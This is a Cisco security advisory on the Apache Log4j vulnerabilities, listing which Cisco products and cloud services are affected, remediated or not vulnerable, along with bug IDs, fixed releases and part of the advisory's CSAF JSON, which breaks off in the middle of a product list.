Cisco RV345P Dual WAN Gigabit POE VPN Router
Cisco Small Business 200 Series Smart Switches
Cisco Small Business 300 Series Managed Switches
Cisco Small Business 500 Series Stackable Managed Switches
Cisco WAP125 Wireless-AC Dual Band Desktop Access Point with PoE
Cisco WAP150 Wireless-AC/N Dual Radio Access Point with PoE
Cisco WAP361 Wireless-AC/N Dual Radio Wall Plate Access Point with PoE
Cisco WAP371 Wireless-AC/N Radio Access Point with Single Point Setup
Cisco WAP571 Wireless-AC/N Premium Dual Radio Access Point with PoE
Cisco WAP571E Wireless-AC/N Premium Dual Radio Outdoor Access Point
Cisco WAP581 Wireless-AC Dual Radio Wave 2 Access Point with 2.5GbE LAN
Unified Computing
Cisco 5000 Series Enterprise Network Compute System (ENCS)
Cisco HyperFlex System
Cisco Hyperflex Storage Replication Adapter
Cisco UCS C-Series Rack Servers and S-Series Storage Servers - Integrated Management Controller (CIMC)
Cisco UCS E-Series Servers
Cisco UCS Manager
Voice and Unified Communications Devices
Cisco Headset 500 and 700 Series
Cisco Hosted Collaboration Mediation Fulfillment
Cisco IP Phones with Multiplatform Firmware
Cisco IP Phones
Cisco TelePresence Endpoints
Cisco Unified Attendant Console Advanced
Cisco Unified Attendant Console Business Edition
Cisco Unified Attendant Console Department Edition
Cisco Unified Attendant Console Enterprise Edition
Cisco Unified Attendant Console Premium Edition
Cisco Unified Communications Domain Manager
Cisco Unity Express
Cisco Webex Devices
Cisco Webex Hybrid Data Security Node
Cisco Webex Video Mesh
Video, Streaming, TelePresence, and Transcoding Devices
Cisco Expressway Series
Cisco Meeting Management (CMM)
Cisco Meeting Server
Cisco TelePresence Management Suite
Cisco TelePresence Video Communication Server (VCS)
Cisco Video Surveillance Media Server
Wireless
Cisco AireOS Wireless LAN Controllers
Cisco Aironet Access Points
Cisco Business 100 and 200 Series Access Points
Cisco Business Wireless
Cisco Catalyst 9100 Series Access Points
Cisco Catalyst 9800 Series Wireless Controllers
Cisco IOS Access Points
Cisco Mobility Services Engine
Cisco Ultra-Reliable Wireless Backhaul
Cisco Cloud Offerings
Cisco investigated its cloud offerings to determine which products may be affected by these vulnerabilities. The following table lists Cisco cloud offerings that were part of this investigation.
Product CVE-2021-44228 CVE-2021-45046 AppDynamics Remediated - service-specific details ["https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability"] Remediated - service-specific details ["https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability"] AppDynamics with Cisco Secure Application Remediated - service-specific details ["https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability"] Remediated - service-specific details ["https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability"] Cisco Cloud Email Security Not vulnerable Not vulnerable Cisco Cloudlock Remediated Remediated Cisco Cloudlock for Government Remediated Remediated Cisco Cognitive Intelligence Not vulnerable Not vulnerable Cisco Collaboration Experience Service (CES) Not vulnerable Not vulnerable Cisco Collaboration Experience Service Management (CESM) Not vulnerable Not vulnerable Cisco Crosswork Cloud Not vulnerable Not vulnerable Cisco CX Cloud Remediated Remediated Cisco Defense Orchestrator Not vulnerable Not vulnerable Cisco DNA Spaces Remediated Remediated Cisco Intersight Remediated Remediated Cisco IoT Control Center Remediated Remediated Cisco IoT Operations Dashboard Remediated Remediated Cisco Kinetic for Cities Remediated Remediated Cisco Kinetic Gateway Management Module Remediated Remediated Cisco Managed Services Accelerator (MSX) Remediated Remediated Cisco Placetel Not vulnerable Not vulnerable Cisco PX Cloud Remediated Remediated Cisco SD-WAN Cloud Remediated Remediated Cisco SD-WAN vAnalytics Not vulnerable Not vulnerable Cisco Secure Application (integrated with AppDynamics) Not vulnerable ["https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability"] Not vulnerable ["https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability"] Cisco Secure Cloud Analytics, formerly Cisco Stealthwatch Cloud Not vulnerable Not vulnerable Cisco Secure Cloud Insights Not vulnerable Not vulnerable Cisco Secure Email Cloud Mailbox, formerly Cisco Cloud Mailbox Defense Not vulnerable Not vulnerable Cisco Secure Email Encryption Service, formerly Cisco Registered Envelope Service Not vulnerable Not vulnerable Cisco Secure Endpoint, formerly Cisco Advanced Malware Protection for Endpoints Not vulnerable Not vulnerable Cisco Secure Malware Analytics, formerly Cisco Threat Grid Not vulnerable Not vulnerable Cisco SecureX Not vulnerable Not vulnerable Cisco ServiceGrid Not vulnerable Not vulnerable Cisco Smart Net Total Care Remediated Remediated Cisco Umbrella DNS Remediated Remediated Cisco Umbrella SIG Remediated Remediated Cisco Unified Communications Management Cloud - UC Management Remediated Remediated Cisco Unified Communications Manager Cloud Commercial Remediated Remediated Cisco Unified Communications Manager Cloud for Government Remediated Remediated Cisco Webex Calling Remediated Remediated Cisco Webex Calling Carrier Remediated Remediated Cisco Webex Cloud Registered Endpoints Not vulnerable Not vulnerable Cisco Webex Cloud-Connected UC Remediated Remediated Cisco Webex Contact Center Remediated Remediated Cisco Webex Contact Center Enterprise Remediated Remediated Cisco Webex Control Hub Remediated Remediated Cisco Webex Experience Management Not vulnerable Not vulnerable Cisco Webex FedRAMP Remediated Remediated Cisco Webex for Government FedRAMP Remediated Remediated Cisco Webex Meetings Remediated Remediated Cisco Webex Meetings Slow Channel Remediated Remediated Cisco Webex Messaging Remediated Remediated Cisco Webex Site Admin webpage Remediated Remediated Duo Security Remediated Remediated Duo Security for Government Remediated Remediated eSIM Flex Remediated Remediated IMIassist Not vulnerable Not vulnerable IMIcampaign Not vulnerable Not vulnerable IMIconnect Remediated Remediated IMIengage Not vulnerable Not vulnerable IMImessenger/TextLocal Messenger Not vulnerable Not vulnerable IMImobile - Webex Contact Center Integration Remediated Remediated IMInotify Not vulnerable Not vulnerable IMIsocial Not vulnerable Not vulnerable Kenna.AppSec Remediated Remediated Kenna.VI/VI+ Remediated Remediated Kenna.VM Remediated Remediated Meraki Not vulnerable Not vulnerable Partner Supporting Service(PSS) Remediated Remediated Slido Not vulnerable Not vulnerable Smart Call Home(SCH) Remediated Remediated Socio Not vulnerable Not vulnerable ThousandEyes Remediated Remediated UC-One - UMS Not vulnerable Not vulnerable
Workarounds
Any workarounds are documented in the product-specific Cisco bugs, which are identified in the Vulnerable Products ["#vp"] section of this advisory.
Fixed Software
For information about fixed software releases, consult the Cisco bugs identified in the Vulnerable Products ["#vp"] section of this advisory.
When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
Vulnerability Policy
To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy ["https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html"]. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.
Exploitation and Public Announcements
The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities described in this advisory.
Source
These vulnerabilities were disclosed by the Apache Software Foundation.
Legal Disclaimer
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.
{
"document": {
"acknowledgments": [
{
"summary": "These vulnerabilities were disclosed by the Apache Software Foundation."
}
],
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"notes": [
{
"category": "summary",
"text": "Critical Vulnerabilities in Apache Log4j Java Logging Library\r\n\r\nOn December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed:\r\n\r\nCVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints\r\n\r\nOn December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed:\r\n\r\nCVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack\r\n\r\nOn December 18, 2021, a vulnerability in the Apache Log4j component affecting versions 2.16 and earlier was disclosed:\r\n\r\nCVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation\r\n\r\nOn December 28, 2021, a vulnerability in the Apache Log4j component affecting versions 2.17 and earlier was disclosed:\r\n\r\nCVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration\r\n\r\nFor a description of these vulnerabilities, see the Apache Log4j Security Vulnerabilities [\"https://logging.apache.org/log4j/2.x/security.html\"] page.\r\n\r\nCisco\u0027s Response to These Vulnerabilities\r\n\r\nCisco assessed all products and services for impact from both CVE-2021-44228 and CVE-2021-45046. To help detect exploitation of these vulnerabilities, Cisco has released Snort rules at the following location: Talos Rules 2021-12-21 [\"https://www.snort.org/advisories/talos-rules-2021-12-21\"]\r\n\r\nProduct fixes that are listed in this advisory will address both CVE-2021-44228 and CVE-2021-45046 unless otherwise noted.\r\n\r\nCisco has reviewed CVE-2021-45105 and CVE-2021-44832 and has determined that no Cisco products or cloud offerings are impacted by these vulnerabilities.\r\n\r\nCisco\u0027s standard practice is to update integrated third-party software components to later versions as they become available.\r\n\r\n",
"title": "Summary"
},
{
"category": "general",
"text": "Cisco investigated its product line to determine which products may be affected by these vulnerabilities.\r\n\r\nThis advisory only lists Cisco products and services that are known to include the impacted software component and thus may be vulnerable. Products and services that do not contain the impacted software component are not vulnerable and therefore are not listed in this advisory. Any Cisco product or service that is not explicitly listed in the Affected Products section of this advisory is not affected by the vulnerability or vulnerabilities described.\r\n\r\nThe Vulnerable Products [\"#vp\"] section includes Cisco bug IDs for each affected product. The bugs are accessible through the Cisco Bug Search Tool and contain additional platform-specific information, including workarounds (if available) and fixed software releases.",
"title": "Affected Products"
},
{
"category": "general",
"text": "Cisco investigated its product line to determine which products may be affected by these vulnerabilities.\r\n\r\nThe following table lists Cisco products that are affected by one or both of the vulnerabilities that are described in this advisory. Customers should refer to the associated Cisco bug(s) for further details.\r\n Product Cisco Bug ID Fixed Release Availability [\"https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html#fixes\"] Collaboration and Social Media Cisco Webex Meetings Server CSCwa47283 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47283\"] CWMS-3.0MR4SP3 patch (21 Dec 2021)\r\nCWMS-4.0MR4SP3 patch (21 Dec 2021)\r\nCWMS-3.0MR4SP2 patch (14 Dec 2021)\r\nCWMS-4.0MR4SP2 patch (14 Dec 2021) Endpoint Clients and Client Software Cisco CX Cloud Agent Software CSCwa47272 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47272\"] 1.12.2 (17 Dec 2021) Network Application, Service, and Acceleration Cisco Call Studio CSCwa54008 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa54008\"] 11.6(2) (23 Dec 2021)\r\n12.0(1) (23 Dec 2021)\r\n12.5(1) (23 Dec 2021)\r\n12.6(1) (23 Dec 2021) Cisco Nexus Insights CSCwa47284 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47284\"] 6.0.2 (17 Dec 2021) Network and Content Security Devices Cisco Firepower Threat Defense (FTD) managed by Firepower Device Manager (FDM) CSCwa46963 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46963\"] 6.2.3 hotfix (Available)\r\n6.4.0 hotfix (Available)\r\n6.6.5 hotfix (Available)\r\n6.7.0 hotfix (Available)\r\n7.0.1 hotfix (Available)\r\n7.1.0 hotfix (Available) Cisco Identity Services Engine (ISE) CSCwa47133 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47133\"] 2.4 hotfix (15 Dec 2021)\r\n2.6 hotfix (15 Dec 2021)\r\n2.7 hotfix (15 Dec 2021)\r\n3.0 hotfix (15 Dec 2021)\r\n3.1 hotfix (17 Dec 2021) Network Management and Provisioning Cisco Application Policy Infrastructure Controller (APIC) - Network Insights Base App CSCwa47295 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47295\"] 4.2(7r) (Available)\r\n5.2(3g) (Available) Cisco Automated Subsea Tuning CSCwa48806 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48806\"] 2.1.0.4 (22 Dec 2021) Cisco Business Process Automation CSCwa47269 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47269\"] 3.0.000.115 (patch) (17 Dec 2021)\r\n3.1.000.044 (patch) (17 Dec 2021)\r\n3.2.000.009 (patch) (17 Dec 2021) Cisco CloudCenter Cost Optimizer CSCwa48074 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48074\"] 5.5.2 (Available) Cisco CloudCenter Suite Admin CSCwa47349 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47349\"] 5.3.1 (Available) Cisco CloudCenter Workload Manager CSCwa47350 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47350\"] 5.5.2 (Available) Cisco CloudCenter CSCwa48832 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48832\"] 4.10.0.16 (22 Dec 2021) Cisco Common Services Platform Collector (CSPC) CSCwa47271 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47271\"] 2.10.0.1 hotfix (Available)\r\n2.9.1.3 hotfix (Available) Cisco Crosswork Data Gateway CSCwa47257 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47257\"] 2.0.2 patch (21 Dec 2021)\r\n3.0.1 patch (21 Dec 2021) Cisco Crosswork Network Controller CSCwa49936 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49936\"] 2.0.1 patch (22 Dec 2021)\r\n3.0.1 patch (22 Dec 2021) Cisco Crosswork Optimization Engine CSCwa49939 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49939\"] 2.0.1 patch (21 Dec 2021)\r\n3.0.1 patch (21 Dec 2021) Cisco Crosswork Platform Infrastructure CSCwa47367 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47367\"] 4.0.1 patch (22 Dec 2021)\r\n4.1.1 patch (22 Dec 2021) Cisco Crosswork Situation Manager CSCwa51878 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51878\"] 8.0.0.8 patch (21 Dec 2021) Cisco Crosswork Zero Touch Provisioning (ZTP) CSCwa47259 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47259\"] 2.0.1 patch (21 Dec 2021)\r\n3.0.1 patch (21 Dec 2021) Cisco Cyber Vision Sensor Management Extension CSCwa49482 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49482\"] 4.0.3 (22 Dec 2021) Cisco DNA Spaces Connector CSCwa47320 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47320\"] v2.0.588 (Available)\r\nv2.2.12 (Available) Cisco Data Center Network Manager (DCNM) CSCwa47291 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47291\"] 12.0(2f) (Available)\r\n11.5(3) patch (Available)\r\n11.5(2) patch (Available)\r\n11.5(1) patch (Available)\r\n11.4(1) patch (Available)\r\n11.3(1) patch (Available) Cisco Evolved Programmable Network Manager CSCwa47310 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47310\"] 5.1.3.1 patch (22 Dec 2021)\r\n5.0.2.1 patch (13 Jan 2022)\r\n4.1.1.1 patch (13 Jan 2022) Cisco Intersight Virtual Appliance CSCwa47304 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47304\"] 1.0.9-361 (20 Dec 2021) Cisco Network Services Orchestrator (NSO) CSCwa47342 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47342\"] nso-5.3.5.1 (17 Dec 2021)\r\nnso-5.4.5.2 (17 Dec 2021)\r\nnso-5.5.4.1 (17 Dec 2021)\r\nnso-5.6.3.1 (17 Dec 2021) Cisco Nexus Dashboard, formerly Cisco Application Services Engine CSCwa47299 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47299\"] 2.1.2 (23 Dec 2021) Cisco Prime Service Catalog CSCwa47347 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47347\"] 12.1 patch (20 Dec 2021) Cisco Secure Agile Exchange (SAE) Core Function Pack CSCwa52921 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52921\"] 2.4.1 (14 Jan 2022) Cisco Smart PHY CSCwa50021 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50021\"] 3.1.4 patch (Available)\r\n3.2.0 patch (Available)\r\n3.2.1 patch (Available)\r\n21.3 patch (21 Jan 2022) Cisco Virtual Topology System (VTS) CSCwa47334 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47334\"] 2.6.7 (22 Dec 2021) Cisco Virtualized Infrastructure Manager CSCwa49924 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49924\"] 3.2.x patch (17 Dec 2021)\r\n3.4.4 patch (17 Dec 2021)\r\n3.4.6 patch (17 Dec 2021)\r\n4.2.0 patch (17 Dec 2021)\r\n4.2.1 patch (17 Dec 2021) Cisco WAN Automation Engine (WAE) CSCwa47369 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47369\"] 7.5.0.1 (22 Dec 2021)\r\n7.4.0.1 (28 Jan 2022)\r\n7.3.0.2 (28 Jan 2022) Routing and Switching - Enterprise and Service Provider Cisco DNA Center CSCwa47322 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47322\"] 2.2.2.8 patch (Available)\r\n2.1.2.8 patch (Available)\r\n2.2.3.4 patch (Available) Cisco IOx Fog Director CSCwa47370 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47370\"] 1.14.5 patch (16 Dec 2021)\r\n1.16.4 patch (Available) Cisco Network Assurance Engine CSCwa47285 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47285\"] 6.0.2 (23 Dec 2021) Cisco Network Convergence System 1004 CSCwa52235 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52235\"] 7.3.2 SMU/GISO (14 Jan 2022)\r\n7.3.1 SMU (21 Jan 2022) Cisco Optical Network Controller CSCwa48793 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48793\"] 1.1.0 (22 Dec 2021) Cisco SD-WAN vManage CSCwa47745 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47745\"] 20.3.4.1 (Available)\r\n20.6.2.1 (Available)\r\n20.5.1.1 (Available)\r\n20.4.2.1 (Available) Unified Computing Cisco Integrated Management Controller (IMC) Supervisor CSCwa47307 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47307\"] 2.3.2.1 (23 Dec 2021) Cisco UCS Central Software CSCwa47303 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47303\"] 2.0(1p) (22 Dec 2021) Cisco UCS Director CSCwa47288 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47288\"] 6.8.2.0 (23 Dec 2021) Cisco Workload Optimization Manager CSCwa50220 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50220\"] 3.2.1 patch (Available) Voice and Unified Communications Devices Cisco BroadWorks CSCwa47315 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47315\"] 2021.11_1.162 (13 Dec 2021)\r\nap381882 (15 Dec 2021) Cisco Cloud Connect CSCwa51545 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51545\"] 12.6(1) (Available) Cisco Contact Center Domain Manager (CCDM) CSCwa47383 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47383\"] 12.5(1) ES6 (Available)\r\n12.6(1) ES3 (Available) Cisco Contact Center Management Portal (CCMP) CSCwa47383 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47383\"] 12.5(1) ES6 (Available)\r\n12.6(1) ES3 (Available) Cisco Emergency Responder CSCwa47391 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47391\"] 11.5(4)SU9 patch (16 Dec 2021)\r\n11.5(4)SU10 patch (16 Dec 2021) Cisco Enterprise Chat and Email CSCwa47392 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47392\"] 12.0(1) patch (Available)\r\n12.5 (1) patch (Available)\r\n12.6(1) patch (Available) Cisco Finesse CSCwa46459 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46459\"] 12.6(1)ES03 (23 Dec 2021) Cisco Packaged Contact Center Enterprise CSCwa47274 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47274\"] 11.6(2) (Available)\r\n12.0(1) (Available)\r\n12.5(1) (Available)\r\n12.6(1) (Available) Cisco Paging Server CSCwa47395 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47395\"] 14.4.2 (21 Dec 2021) Cisco Unified Communications Manager / Cisco Unified Communications Manager Session Management Edition CSCwa47249 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47249\"] 11.5(1)SU7 patch (16 Dec 2021)\r\n11.5(1)SU8 patch (16 Dec 2021)\r\n11.5(1)SU9 patch (16 Dec 2021)\r\n11.5(1)SU10 patch (16 Dec 2021)\r\n11.5(1.18119-2) through 11.5(1.23162-1) patch (16 Dec 2021) Cisco Unified Communications Manager IM \u0026Presence Service CSCwa47393 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47393\"] 11.5(1)SU7 patch (16 Dec 2021)\r\n11.5(1)SU8 patch (16 Dec 2021)\r\n11.5(1)SU9 patch (16 Dec 2021)\r\n11.5(1)SU10 patch (16 Dec 2021)\r\n11.5(1.18900-16) patch (16 Dec 2021)\r\n11.5(1.18901-3) patch (16 Dec 2021) Cisco Unified Contact Center Enterprise - Live Data server CSCwa46810 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46810\"] 11.6(1)ES23 (23 Dec 2021)\r\n12.0(1)ES18 (23 Dec 2021)\r\n12.5(1)ES13 (23 Dec 2021)\r\n12.6(1)ES03 (23 Dec 2021) Cisco Unified Contact Center Enterprise CSCwa47273 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47273\"] 11.6(2) (Available)\r\n12.0(1) (Available)\r\n12.5(1) (Available)\r\n12.6(1) (Available) Cisco Unified Contact Center Express CSCwa47388 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47388\"] 12.5(1)SU1 (23 Dec 2021) Cisco Unified Customer Voice Portal CSCwa47275 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47275\"] 11.6(2) (Available)\r\n12.0(1) (Available)\r\n12.5(1) (Available)\r\n12.6(1) (23 Dec 2021) Cisco Unified Intelligence Center CSCwa46525 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46525\"] 12.6(1) (23 Dec 2021) Cisco Unified SIP Proxy Software CSCwa47265 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47265\"] 10.2.1v2 patch (23 Dec 2021) Cisco Unity Connection CSCwa47387 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47387\"] 11.5(1)SU7 patch (16 Dec 2021)\r\n11.5(1)SU8 patch (16 Dec 2021)\r\n11.5(1)SU9 patch (16 Dec 2021)\r\n11.5(1)SU10 patch (16 Dec 2021)\r\n11.5(1.18119-2) through 11.5(1.23162-1) patch (16 Dec 2021) Cisco Virtualized Voice Browser CSCwa47397 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47397\"] 12.5(1) (Available)\r\n12.6(1) (23 Dec 2021) Cisco Webex Workforce Optimization CSCwa51476 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51476\"] Product is End of Software Maintenance - No Fixes Planned Video, Streaming, TelePresence, and Transcoding Devices Cisco Video Surveillance Operations Manager CSCwa47360 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47360\"] 7.14.4 patch (Available) Cisco Vision Dynamic Signage Director CSCwa47351 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47351\"] Contact Cisco TAC for a patch\r\n6.4 SP3 (17 Jan 2021) Wireless Cisco Connected Mobile Experiences (CMX) CSCwa47312 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47312\"] 10.6.3-70 patch (Available)\r\n10.6.3-105 patch (Available)\r\n10.6.2-89 patch (Available)\r\n10.4.1 patch (Available)",
"title": "Vulnerable Products"
},
{
"category": "general",
"text": "Cisco investigated its product line to determine which products may be affected by these vulnerabilities.\r\n\r\nAny product not listed in the Products Under Investigation or Vulnerable Products section of this advisory is to be considered not vulnerable.\r\n\r\nCisco has confirmed that these vulnerabilities do not affect the following Cisco products:\r\n\r\nCable Devices\r\n\r\nCisco GS7000 Nodes\r\nCisco RF Gateway Series\r\nCisco Remote PHY 120\r\n\r\nCollaboration and Social Media\r\n\r\nCisco SocialMiner\r\n\r\nEndpoint Clients and Client Software\r\n\r\nCisco AnyConnect Secure Mobility Client\r\nCisco Jabber Guest\r\nCisco Jabber\r\nCisco Secure Endpoint, formerly Cisco Advanced Malware Protection for Endpoints\r\nCisco Webex App\r\n\r\nMeraki Products\r\n\r\nCisco Meraki Go Series\r\nCisco Meraki MR Series Cloud-Managed Wireless Access Points\r\nCisco Meraki MS Series Switches\r\nCisco Meraki MT Series Sensors\r\nCisco Meraki MV Series Cloud-Managed Smart Cameras\r\nCisco Meraki MX Series Cloud-Managed Security and SD-WAN\r\nCisco Meraki Systems Manager (SM)\r\nCisco Meraki Z-Series Cloud-Managed Teleworker Gateway\r\n\r\nNetwork Application, Service, and Acceleration\r\n\r\nCisco Cloud Services Platform 2100\r\nCisco Cloud Services Platform 5000 Series\r\nCisco Nexus Dashboard Data Broker\r\nCisco Tetration Analytics\r\nCisco Wide Area Application Services (WAAS)\r\nConfD\r\n\r\nNetwork and Content Security Devices\r\n\r\nCisco AMP Virtual Private Cloud Appliance\r\nCisco Adaptive Security Appliance (ASA) Software\r\nCisco Adaptive Security Device Manager\r\nCisco Adaptive Security Virtual Appliance (ASAv)\r\nCisco Advanced Web Security Reporting Application\r\nCisco Email Security Appliance (ESA)\r\nCisco FXOS Firepower Chassis Manager\r\nCisco Firepower Management Center\r\nCisco Firepower Next-Generation Intrusion Prevention System (NGIPS)\r\nCisco Firepower Threat Defense (FTD) managed by Cisco Firepower Management Center\r\nCisco Secure Email Encryption Add-in\r\nCisco Secure Email Encryption Plugin for Outlook\r\nCisco Secure Email Security Plugin for Outlook\r\nCisco Secure Email and Web Manager, formerly Cisco Content Security Management Appliance (SMA)\r\nCisco Secure Network Analytics, formerly Stealthwatch Enterprise, Advanced Host Group Automation (AHGA)\r\nCisco Secure Network Analytics, formerly Stealthwatch Enterprise, Flow Adapter\r\nCisco Secure Network Analytics, formerly Stealthwatch Enterprise, Network Forensics Automation (NFA)\r\nCisco Secure Network Analytics, formerly Stealthwatch Enterprise, Proxy Adapter\r\nCisco Secure Network Analytics, formerly Stealthwatch\r\nCisco Secure Services Proxy (CSSP)\r\nCisco Security Malware Analytics Appliance, formerly Cisco Threat Grid Appliance\r\nCisco Security Manager\r\nCisco Web Security Appliance (WSA)\r\n\r\nNetwork Management and Provisioning\r\n\r\nCisco ACI Multi-Site Orchestrator\r\nCisco CloudCenter Action Orchestrator\r\nCisco Connected Grid Device Manager\r\nCisco Container Platform\r\nCisco Crosswork Change Automation\r\nCisco Crosswork Health Insights\r\nCisco Crosswork Service Health\r\nCisco Elastic Services Controller (ESC)\r\nCisco Intelligent Node (iNode) Manager\r\nCisco Intersight Mobile App\r\nCisco IoT Field Network Director, formerly Cisco Connected Grid Network Management System\r\nCisco Modeling Labs\r\nCisco NCS 2000 Shelf Virtualization Orchestrator\r\nCisco Optical Network Planner\r\nCisco Policy Suite\r\nCisco Prime Access Registrar\r\nCisco Prime Cable Provisioning\r\nCisco Prime Central for Service Providers\r\nCisco Prime Collaboration Assurance\r\nCisco Prime Collaboration Deployment\r\nCisco Prime Collaboration Provisioning\r\nCisco Prime IP Express\r\nCisco Prime Infrastructure\r\nCisco Prime License Manager\r\nCisco Prime Network Registrar\r\nCisco Prime Network\r\nCisco Prime Optical for Service Providers\r\nCisco Prime Performance Manager\r\nCisco Prime Provisioning\r\nCisco Process Orchestrator\r\nCisco Smart Software Manager On-Prem\r\nCisco Telemetry Broker\r\n\r\nRouting and Switching - Enterprise and Service Provider\r\n\r\nCisco ACI Virtual Edge\r\nCisco ASR 5000 Series Routers\r\nCisco Application Policy Infrastructure Controller Enterprise Module (APIC-EM)\r\nCisco Enterprise NFV Infrastructure Software (NFVIS)\r\nCisco GGSN Gateway GPRS Support Node\r\nCisco IOS XR Software\r\nCisco IOS and IOS XE Software\r\nCisco IP Services Gateway (IPSG)\r\nCisco MDS 9000 Series Multilayer Switches\r\nCisco MME Mobility Management Entity\r\nCisco Mobility Unified Reporting and Analytics System\r\nCisco Network Convergence 